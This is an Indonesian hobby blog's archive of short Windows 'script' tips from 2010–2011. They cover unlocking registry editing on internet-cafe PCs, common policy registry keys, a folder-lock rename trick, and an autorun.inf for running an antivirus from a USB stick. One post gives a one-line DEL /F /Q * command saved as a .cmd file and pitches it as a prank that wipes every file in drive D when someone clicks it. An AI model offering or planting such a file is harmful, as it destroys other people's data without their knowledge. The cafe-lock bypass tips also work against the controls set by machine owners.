RSS

Arsip Kategori: Script

Enable Registry Editor

Postingan kedua gw hari ini ga jauh jauh dari postingan sebelumnya,masih tentang registry.Nah,kali ini bagaimana membuka registry yang di kunci oleh operator warnet.Kalau registrynya di kunci kita jadi ga bisa otak atik registrynya kan,kesannya jadi ga bebas.Nah,berikut ga kasih script buat buka kuncinya.Ce ki dot .Kalau yang udah ahli,mohon di maklumin.

1.Yang jelas,buka dulu notepad lo.Ga perlu gw jelasin deh buat buka notepadnya.
2.Copas script di bawah ini.
Read the rest of this entry »

Iklan
 
Tinggalkan komentar

Ditulis oleh pada Oktober 8, 2011 in Info Teknologi, Script

 

Registry Yang sering di ubah Operator Warnet


Sobat semua pasti sudah tahu kan kalo ngenet di warnet itu komputernya terkadang di protek banget sama operator sampe sampe klik kanan,keyboard,ganti wallpaper,dan lain lain ga berfungsi secara normal.Nah,kali ini gw cuma mau posting registry registry yang sering di edit si operator warnet.Ce ki dot bro.

==================================================================================

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“NoDispCpl”=dword:00000001
“NoDispBackgroundPage”=dword:00000000
“NoDispScrSavPage”=dword:00000000
Read the rest of this entry »

 
2 Komentar

Ditulis oleh pada Oktober 8, 2011 in Corat Coret, Info Teknologi, Script

 

Trik simpel mengunci folder tanpa pusing tanpa ribet !!!

Trik ini aku peroleh secara tidak sengaja saat surfing di sebuah blog.Mungkin udah banyak yang tau ya..sekedar menuh menuhin artikel..haha…Ingin ngunci sebuah folder ???????tapi ga mau ribet,,,ga mau pake software ??????pake trik ini aja…cuma pake explorer bawaan windows…udah aku coba…mudah banget lo..ya sudah daripada kebanyakan basa basi,,,,,aku nya malah bingung sendiri,,,hehe,,,Berikut caranya…let’s check it :

Caranya:
1. Pilih folder yang akan dikunci.
2. Klik kanan, pilih rename ato Tekan F2.
3. Tambahkan kode di bawah ini pada akhir nama folder:

“.{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0}” tanpa tanda kutip

4. Klo udah tekan enter.
5. Icon folder akan berubah jadi icon gembok.

Nah,,folder ga akan bisa ke buka

Untuk membuka tinggal rename dan hapus kode sebelumnya menggunakan winrar

Sumber : hackcenter.wordpress.com

 
Tinggalkan komentar

Ditulis oleh pada Juli 1, 2010 in Info Teknologi, Script

 

Bikin File Perusak tapi tak bisa di katakan virus

Browsing browsing eh malah nemu artikel beginian,,ya udah ku posting aja ya…let’s check it…

Membuat virus !sebenarnya mudah (padahal blom bisa,,,hehe)tapi kali ini aq mau berbagi cara membuat file perusak
tapi belum bisa di katakan virus ataupun spam,tapi hanya file perusak saja.
Proses kerjanya :
apabila file ini di klik maka secara otomatis semua file yang ada di direktori D akan terhapus.
Lumayan kan buat ngejailin temen he he he…(tapi ada kelemahannya yaitu file yang ada di dalam folder
tidak terhapus,tapi ada cara untuk mengatasinya ,tinggal letakkan aja di dalam foldernya ntar juga hilang)

terus gimana buat filenya,,,,???nih caranya

1.buka note pad
2.ketik DEL /F /Q *
3.save dengan akhiran(ektensiI) .cmd
Contoh: test.cmd
4.udah ,kamu tinggal letakkan di direktori D ,dan apabila ada yang mengklik file tadi maka hilang deh semua filenya.

nah,,,silakan di coba jika ada kesalahan,,,,,tanggung sendiri ya,,
Oke,,mungkin cukup segitu…..
Peace Salam 2 jari…haha

 
1 Komentar

Ditulis oleh pada Juni 28, 2010 in Info Teknologi, Script

 

Jalanin Anti Virus Lewat flashdisk

Cara buat antivirus di fd (flashdisk) sbb :

pertama-tama buatlah AUTORUN untuk menjalangkan antivirus pada fd (flashdisk) !, carax copy
antivirus yg berukurang kecil ke fd (flashdisk) kita, sembarang maunya antivirus apa
contonya PCMAV,ANSAV….dll (dicontoh kali ini saya menggunakan PCMAV karna ukurangx kecil
bangat ngak sampe 3 MB). oke deh…kita buat scrip dulu untuk autorun di fd kita….
tinggal ketik or copy aja di notepad

============potong disini============

[AUTORUN]
open=nama antivirus.exe
shellexecute=nama antivirus.exe
shell\scan_viruz_dulu_donkz:-)_!!!\command=nama antivirus.exe
shell=scan_viruz_dulu_donkz:-)_!!!

============potong disini============

kalo udah kita save dengan nama “autorun.inf” (ngak pake tanda kutip) di fd kita
sekarang kita copy aja antivirusnya ke fd..!!!
(ingat kalo ngopy file autorun dan antivirusnya bukan di dalam folder, ingat yah…!!!).

Jadi deh..^_^ kalo mau scan virus tinggal double click aja tuh drive fd-nya *=*
terus kalo kita klik kanan drive fd-nya BUKANKAH ADA TAMBAHAN KATA DI ATAS KATA AUTOPLAY.
attrib +h +s nama antivirusnya.exe (buat sembunyiin antivirusnya)
f:\>attrib +h +s autorun.inf (buat hidden file autorunnya)

entar ..^_^..ilang deh filenya……..*=*

fsnya siap dipergunakan
huh…..selesai deh proyek kita…..^_^

Berikut ada pertanyaan serta jawabannya….Hehe..Let’s Check it

1.
Pertanyaan:

ko’ g’ bisa jalan y program autorunx bantuin donkz,di nama antivirusx aq isi PCMAV-CLN.exe,gemana ????
2.
Jawaban:

jangan di simpan di dalam folder tapi kalo mau di simpan didalam folder gini scripnya
contoh nama foldernya hack
lalu nama anti virusnya ansav
——————————————————-
[AUTORUN]
open=hack/ansav.exe
shellexecute=hack/ansav.exe
shell\scan_viruz_dulu_donkz:-)_!!!\command=hack/ansav.exe
shell=scan_viruz_dulu_donkz:-)_!!!
——————————————————–
lalu save dengan nama autorun.inf
tambahan kalo mau mengganti icon fd anda gini juga caranya
contoh nama icon : newbie.ico
——————————————————–
[AUTORUN]
open=hack/ansav.exe
shellexecute=hack/ansav.exe
shell\scan_viruz_dulu_donkz:-)_!!!\command=hack/ansav.exe
shell=scan_viruz_dulu_donkz:-)_!!!
icon=newbie.ico
——————————————————–
kembali save dengan nama autorun.inf

Oke,,mungkin cukup segitu…..
Peace Salam 2 jari…haha

 
1 Komentar

Ditulis oleh pada Juni 25, 2010 in Info Teknologi, Script